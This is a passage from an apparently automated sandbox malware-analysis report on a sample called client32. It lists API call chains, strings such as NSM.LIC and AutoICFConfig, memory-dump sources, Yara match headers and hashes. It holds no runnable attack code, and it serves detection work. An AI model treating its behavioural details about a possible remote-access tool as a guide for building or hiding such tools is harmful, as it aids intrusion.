                                                                                  • wsprintfA.USER32 ref: 11147A16
                                                                                    • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                    • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                    • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                    • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: wsprintf$ErrorExitLastLoadMessageProcessString
                                                                                  • String ID: #%d$..\ctl32\util.cpp$i < _tsizeof (buf)
                                                                                  • API String ID: 1985783259-2296142801
                                                                                  APIs
                                                                                  • _malloc.LIBCMT ref: 111101C9
                                                                                    • Part of subcall function 11163A11: __FF_MSGBANNER.LIBCMT ref: 11163A2A
                                                                                    • Part of subcall function 11163A11: __NMSG_WRITE.LIBCMT ref: 11163A31
                                                                                    • Part of subcall function 11163A11: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163A56
                                                                                  • wsprintfA.USER32 ref: 111101E4
                                                                                    • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                    • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                    • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                    • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                  • _memset.LIBCMT ref: 11110207
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: wsprintf$AllocateErrorExitHeapLastMessageProcess_malloc_memset
                                                                                  • String ID: ..\ctl32\Refcount.cpp$Can't alloc %u bytes
                                                                                  • API String ID: 3234921582-2664294811
                                                                                  • Opcode ID: 280ad6f88800d969d30347863d68ea4ddbfee66c9be73721bdded0e9d7f91acb
                                                                                  • Instruction ID: 098e5996781ad60247c7fcf5caa4ca36f886f8102b778af333740a2f918ca33d
                                                                                  • Opcode Fuzzy Hash: 280ad6f88800d969d30347863d68ea4ddbfee66c9be73721bdded0e9d7f91acb
                                                                                  • Instruction Fuzzy Hash: C0F0F6B6E4022863C7209AA49D01FEFF37C9F91609F0001A9FE05B7241EA75AA11C7E5
APIs
  • Part of subcall function 11145C70: GetVersionExA.KERNEL32(111F1EF0,76938400), ref: 11145CA0
  • Part of subcall function 11145C70: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 11145CDF
  • Part of subcall function 11145C70: _memset.LIBCMT ref: 11145CFD
  • Part of subcall function 11145C70: _strncpy.LIBCMT ref: 11145DCA
• LoadLibraryA.KERNEL32(shcore.dll,00000000,?,11030D50,00000002), ref: 111466CF
• GetProcAddress.KERNEL32(00000000,SetProcessDpiAwareness), ref: 111466E1
• FreeLibrary.KERNEL32(00000000,?,11030D50,00000002), ref: 111466F4
Strings
Memory Dump Source
• Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: Library$AddressFreeLoadOpenProcVersion_memset_strncpy
• String ID: SetProcessDpiAwareness$shcore.dll
• API String ID: 1108920153-1959555903
• Opcode ID: e3234517993a23a489bcd726e27309146a97354540acbce9dede09c4332e6aa4
• Instruction ID: b4913e853cd1401fb26aad2e9137c069c6cdc321efb83b495f2c8eb55c4c44ed
• Opcode Fuzzy Hash: e3234517993a23a489bcd726e27309146a97354540acbce9dede09c4332e6aa4
• Instruction Fuzzy Hash: CDF0A03A781225A3E51912AABD58B9ABB5C9BC1A7EF150230F929D6DC0DB50C50082B5
APIs
• wsprintfA.USER32 ref: 11031FE6
  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
Strings
Memory Dump Source
• Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: wsprintf$ErrorExitLastMessageProcess
• String ID: %s%s.bin$648351$clientinv.cpp$m_pDoInv == NULL
• API String ID: 4180936305-314825743
• Opcode ID: bd07d82e204d55fca40885ac61f8c39d8728cbd3a2f7a07743be8c59493d1746
• Instruction ID: 4b30c984cb9feb044c1d7ab8c0844ab34c920fbc261825ed793c706054f3ad77
• Opcode Fuzzy Hash: bd07d82e204d55fca40885ac61f8c39d8728cbd3a2f7a07743be8c59493d1746
• Instruction Fuzzy Hash: D82190B5F00705AFD710CF65CC41BAAB7F4EB88758F10853DE86697681EB35A8008B51
APIs
• GetFileAttributesA.KERNEL32(11145918,00000000,?,11145918,00000000), ref: 1114525C
• __strdup.LIBCMT ref: 11145277
  • Part of subcall function 11081E00: _strrchr.LIBCMT ref: 11081E0E
  • Part of subcall function 11145240: _free.LIBCMT ref: 1114529E
• _free.LIBCMT ref: 111452AC
  • Part of subcall function 11163AA5: HeapFree.KERNEL32(00000000,00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ABB
  • Part of subcall function 11163AA5: GetLastError.KERNEL32(00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ACD
• CreateDirectoryA.KERNEL32(11145918,00000000,?,?,?,11145918,00000000), ref: 111452B7
Memory Dump Source
• Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: _free$AttributesCreateDirectoryErrorFileFreeHeapLast__strdup_strrchr
• String ID:
• API String ID: 398584587-0
• Opcode ID: 9735d3e61c58080a89fa20c82b25ab644093a8acf898cd5def549394436bc947
• Instruction ID: a914e2cea8ad1481f503ba01f1d1a08edacf548165b8a11fd341c03149d2e1b0
• Opcode Fuzzy Hash: 9735d3e61c58080a89fa20c82b25ab644093a8acf898cd5def549394436bc947
• Instruction Fuzzy Hash: 9301D276A04216ABF34115BD6D01FABBB8C8BD2A78F240173F84DD6A81E752E41681A2
APIs
• std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 1100EE52
  • Part of subcall function 111616DA: _setlocale.LIBCMT ref: 111616EC
• _free.LIBCMT ref: 1100EE64
  • Part of subcall function 11163AA5: HeapFree.KERNEL32(00000000,00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ABB
  • Part of subcall function 11163AA5: GetLastError.KERNEL32(00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ACD
• _free.LIBCMT ref: 1100EE77
• _free.LIBCMT ref: 1100EE8A
• _free.LIBCMT ref: 1100EE9D
Memory Dump Source
• Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: _free$ErrorFreeHeapLastLocinfo::_Locinfo_dtor_setlocalestd::_
• String ID:
• API String ID: 3515823920-0
• Opcode ID: ed7eb8e9888c5118949983cd0268dd79b6cba560ecac2a4a446fb5dc8afa845e
• Instruction ID: a44a88996e3d62c283fa82fd04d5e1258298656dbf2da44853d36c331dab430a
• Opcode Fuzzy Hash: ed7eb8e9888c5118949983cd0268dd79b6cba560ecac2a4a446fb5dc8afa845e
• Instruction Fuzzy Hash: 9511B2F2D046559BE720CF99D800A5BFBECEB50764F144A2AE49AD3640E7B2F904CA51
APIs
  • Part of subcall function 111457A0: GetModuleFileNameA.KERNEL32(00000000,?,00000104,11195AD8), ref: 1114580D
  • Part of subcall function 111457A0: SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,1111025B), ref: 1114584E
  • Part of subcall function 111457A0: SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 111458AB
• wsprintfA.USER32 ref: 1114650E
• wsprintfA.USER32 ref: 11146524
  • Part of subcall function 11143E00: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,1111025B,76938400,?), ref: 11143E97
  • Part of subcall function 11143E00: CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 11143EB7
  • Part of subcall function 11143E00: CloseHandle.KERNEL32(00000000), ref: 11143EBF
Strings
Memory Dump Source
• Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: File$CreateFolderPathwsprintf$CloseHandleModuleName
• String ID: %sNSA.LIC$%sNSM.LIC$NSM.LIC
• API String ID: 3779116287-2600120591
• Opcode ID: b80d813afa46409255703ba7a7584a715aa6e7e8051bc230ff80af9931e0e18b
• Instruction ID: d6aa3785d543843f1191885663c1f1b2da884e9fda22ce0040deef08ed208be3
• Opcode Fuzzy Hash: b80d813afa46409255703ba7a7584a715aa6e7e8051bc230ff80af9931e0e18b
• Instruction Fuzzy Hash: 7B01B5BA90122DA6CB10DBB09D41FDEF77CCB1460DF5005A5E8099A540EE60BE44DBD1
APIs
• CoInitialize.OLE32(00000000), ref: 110F4B8A
• GetMessageA.USER32(?,00000000,00000000,00000000), ref: 110F4BAA
• TranslateMessage.USER32(?), ref: 110F4BC4
• DispatchMessageA.USER32(?), ref: 110F4BCA
• CoUninitialize.OLE32 ref: 110F4BE6
Memory Dump Source
• Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Message$DispatchInitializeTranslateUninitialize
                                                                                  • String ID:
                                                                                  • API String ID: 3550192930-0
                                                                                  • Opcode ID: cc0c84c49c7e2416c752fb198c95613c6e3beb4d5de04bc6f877ef0d92a8c20d
                                                                                  • Instruction ID: c6f08b4013ced19d6869e69a0d946a3ee91e256cb2334e467ebd10f862add052
                                                                                  • Opcode Fuzzy Hash: cc0c84c49c7e2416c752fb198c95613c6e3beb4d5de04bc6f877ef0d92a8c20d
                                                                                  • Instruction Fuzzy Hash: A301CC35D0131E9BEB24DAA0DD85F99B3F8AF48719F0002AAE915E2181E774E5048B61
APIs
• CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,1111025B,76938400,?), ref: 11143E97
• CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 11143EB7
• CloseHandle.KERNEL32(00000000), ref: 11143EBF
Strings
Memory Dump Source
• Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: CreateFile$CloseHandle
• String ID: "
• API String ID: 1443461169-123907689
• Opcode ID: 7a1e0e4b99865e682fb8aefe1b378640ee8558a614cdda32459534f13f8ca753
• Instruction ID: 3d5505e67506a11152adc20893aebb2e29c51f354ea5d43c8ad60c1cab3f6bda
• Opcode Fuzzy Hash: 7a1e0e4b99865e682fb8aefe1b378640ee8558a614cdda32459534f13f8ca753
• Instruction Fuzzy Hash: 5921BB31A092B9AFE332CE38DD54BD9BB989B42B14F3002E0E4D5AB5C1DBB19948C750
APIs
  • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
• SetEvent.KERNEL32(?,Client,DisableGeolocation,00000000,00000000,50D94AA1,76232EE0,?,00000000,111821CB,000000FF,?,11030776,UseIPC,00000001,00000000), ref: 1102D8E7
  • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
  • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
  • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
  • Part of subcall function 11110280: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,7736C3F0,?,11110F3D,00000000,00000001,?,?,?,?,?,11031700), ref: 1111029E
• CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 1102D8AA
Strings
Memory Dump Source
• Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: Event$Create$__wcstoi64_malloc_memsetwsprintf
• String ID: Client$DisableGeolocation
• API String ID: 3315423714-4166767992
• Opcode ID: 4f9a6887a53d08cfe871fa0f2f67aa86f35001991e889a0500aa779ebc83bfef
• Instruction ID: cbdab4fc78c667aa17d7f52ea236f8f509ff794b1425e8be210dc820fee18f51
• Opcode Fuzzy Hash: 4f9a6887a53d08cfe871fa0f2f67aa86f35001991e889a0500aa779ebc83bfef
• Instruction Fuzzy Hash: 4921D374B41365AFE312CFA4CD41FA9F7A4E704B08F10066AF925AB7C4D7B5B8008B88
APIs
• GetMessageA.USER32(?,00000000,00000000,00000000), ref: 1102783A
  • Part of subcall function 110CD940: EnterCriticalSection.KERNEL32(00000000,00000000,76933760,00000000,7694A1D0,1105E7CB,?,?,?,?,11026BA3,00000000,?,?,00000000), ref: 110CD95B
  • Part of subcall function 110CD940: SendMessageA.USER32(00000000,00000476,00000000,00000000), ref: 110CD988
  • Part of subcall function 110CD940: SendMessageA.USER32(00000000,00000475,00000000,?), ref: 110CD99A
  • Part of subcall function 110CD940: LeaveCriticalSection.KERNEL32(?,?,?,?,11026BA3,00000000,?,?,00000000), ref: 110CD9A4
• TranslateMessage.USER32(?), ref: 11027850
• DispatchMessageA.USER32(?), ref: 11027856
Strings
Memory Dump Source
• Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: Message$CriticalSectionSend$DispatchEnterLeaveTranslate
• String ID: Exit Msgloop, quit=%d
• API String ID: 3212272093-2210386016
• Opcode ID: 1e7707140bc2ef53bb668a28125e94940fa22640bbb246be592d1b9c462dd20f
• Instruction ID: 817b53cccd486bf52806c908fc33d3d0e945c232de97a35441108a60357cf637
• Opcode Fuzzy Hash: 1e7707140bc2ef53bb668a28125e94940fa22640bbb246be592d1b9c462dd20f
• Instruction Fuzzy Hash: 4C01FC76E8222A66E704DBE59C81FABF7AC9754B08F8040B5EA1493185E7A4B005C7E5
APIs
• GetTickCount.KERNEL32 ref: 110179ED
  • Part of subcall function 110178F0: WaitForSingleObject.KERNEL32(00000324,000000FF), ref: 1101792C
  • Part of subcall function 110178F0: CoInitialize.OLE32(00000000), ref: 11017935
  • Part of subcall function 110178F0: _GetRawWMIStringW@16.PCICL32(Win32_ComputerSystem,00000001,?,?), ref: 1101795C
  • Part of subcall function 110178F0: CoUninitialize.COMBASE ref: 110179C0
  • Part of subcall function 11017810: WaitForSingleObject.KERNEL32(00000324,000000FF), ref: 11017842
  • Part of subcall function 11017810: CoInitialize.OLE32(00000000), ref: 1101784B
  • Part of subcall function 11017810: _GetRawWMIStringW@16.PCICL32(Win32_SystemEnclosure,00000001,?,?), ref: 11017872
  • Part of subcall function 11017810: CoUninitialize.COMBASE ref: 110178D0
• SetEvent.KERNEL32(00000324), ref: 11017A0D
• GetTickCount.KERNEL32 ref: 11017A13
Strings
• touchkbd, systype=%d, chassis=%d, took %d ms, xrefs: 11017A1D
Memory Dump Source
• Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: CountInitializeObjectSingleStringTickUninitializeW@16Wait$Event
• String ID: touchkbd, systype=%d, chassis=%d, took %d ms
• API String ID: 3804766296-4122679463
• Opcode ID: 610e40d61194c34f9e635cc577eb4e6ba02d92eb7ed74a53a25a0e307046be88
• Instruction ID: 40d604bc36e6f054513ad574895ebf983a142e9fcea0f5d6417744b2b8156d0d
• Opcode Fuzzy Hash: 610e40d61194c34f9e635cc577eb4e6ba02d92eb7ed74a53a25a0e307046be88
• Instruction Fuzzy Hash: 74F0A0B6E8021C6FE700DBF99D89E6EB79CDB44318B100436E914C7201E9A2BC1187A1
APIs
• GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 6F9F4FC4
• K32EnumProcessModules.KERNEL32(00000FA0,?,00000000,6F9F8E0D,00000000,?,6F9F8E0D,00000000,?,00000FA0,?), ref: 6F9F4FE4
• SetLastError.KERNEL32(00000078,00000000,?,6F9F8E0D,00000000,?,00000FA0,?), ref: 6F9F4FED
Strings
Memory Dump Source
• Source File: 0000000B.00000002.3455216978.000000006F9F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F9F0000, based on PE: true
• Associated: 0000000B.00000002.3455109046.000000006F9F0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.3455268968.000000006FA30000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.3455302973.000000006FA39000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.3455345140.000000006FA3A000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.3455345140.000000006FA3E000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.3455462215.000000006FA40000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_6f9f0000_client32.jbxd
Yara matches
Similarity
• API ID: AddressEnumErrorLastModulesProcProcess
• String ID: EnumProcessModules
• API String ID: 3858832252-3735562946
• Opcode ID: 04c6aeafda4e3225e111982057756ad841287f96dda597d15899ee2fd594f7f0
• Instruction ID: c430040d88da353d52cafbdf32830463e5db7761fac9914aa1c8a90b3a5eccf3
• Opcode Fuzzy Hash: 04c6aeafda4e3225e111982057756ad841287f96dda597d15899ee2fd594f7f0
• Instruction Fuzzy Hash: 0BF03472A04628AFC720DEA9D844E9B77A8BB48721F00C81AF95AD7640C674E811CFA0
APIs
• GetProcAddress.KERNEL32(?,GetModuleFileNameExA), ref: 6F9F5014
• K32GetModuleFileNameExA.KERNEL32(00000FA0,?,00000000,00000104,00000000,?,6F9F8E50,00000000,?,?,00000104,00000000,?,00000FA0,?), ref: 6F9F5034
• SetLastError.KERNEL32(00000078,00000000,?,6F9F8E50,00000000,?,?,00000104,00000000,?,00000FA0,?), ref: 6F9F503D
Strings
Memory Dump Source
• Source File: 0000000B.00000002.3455216978.000000006F9F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F9F0000, based on PE: true
• Associated: 0000000B.00000002.3455109046.000000006F9F0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.3455268968.000000006FA30000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.3455302973.000000006FA39000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.3455345140.000000006FA3A000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.3455345140.000000006FA3E000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.3455462215.000000006FA40000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_6f9f0000_client32.jbxd
Yara matches
Similarity
• API ID: AddressErrorFileLastModuleNameProc
• String ID: GetModuleFileNameExA
• API String ID: 4084229558-758377266
• Opcode ID: cb4cb57ac6399fed4f61dfc6aa5f1ce79bcd296d8ab00f45f3cb76847ee55938
• Instruction ID: 0d13824d730ba6c122bcd60d6c49a8bab978e1b28e8b80ff1226ce7be9fb36c7
• Opcode Fuzzy Hash: cb4cb57ac6399fed4f61dfc6aa5f1ce79bcd296d8ab00f45f3cb76847ee55938
• Instruction Fuzzy Hash: 40F05E72605718AFC720CF98E844A9777ACEB49760F00851AF949D7240C671F8118BA1
                                                                                  APIs
                                                                                    • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                  • CreateThread.KERNEL32(00000000,00001000,Function_00138580,00000000,00000000,111396D2), ref: 1113877E
                                                                                  • CloseHandle.KERNEL32(00000000,?,111396D2,AutoICFConfig,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 11138785
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CloseCreateHandleThread__wcstoi64
                                                                                  • String ID: *AutoICFConfig$Client
                                                                                  • API String ID: 3257255551-59951473
                                                                                  • Opcode ID: 8ef9440ca52eb6c28e2eb8d9bc5eaacf11d3a77b41f44fd575e1b178a618d9bf
                                                                                  • Instruction ID: 465e4da249eed1782d5a870e25bf0fc53578c4739eb9f60baa785aa5b16743b3
                                                                                  • Opcode Fuzzy Hash: 8ef9440ca52eb6c28e2eb8d9bc5eaacf11d3a77b41f44fd575e1b178a618d9bf
                                                                                  • Instruction Fuzzy Hash: 93E0D8397A0319BBF2108BE28D4BFA0FB5D9700766F100324FB34650C8E6A0B4408755
                                                                                  APIs
                                                                                  • Sleep.KERNEL32(000000FA), ref: 11070FE7
                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 11070FF4
                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 110710C6
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmp
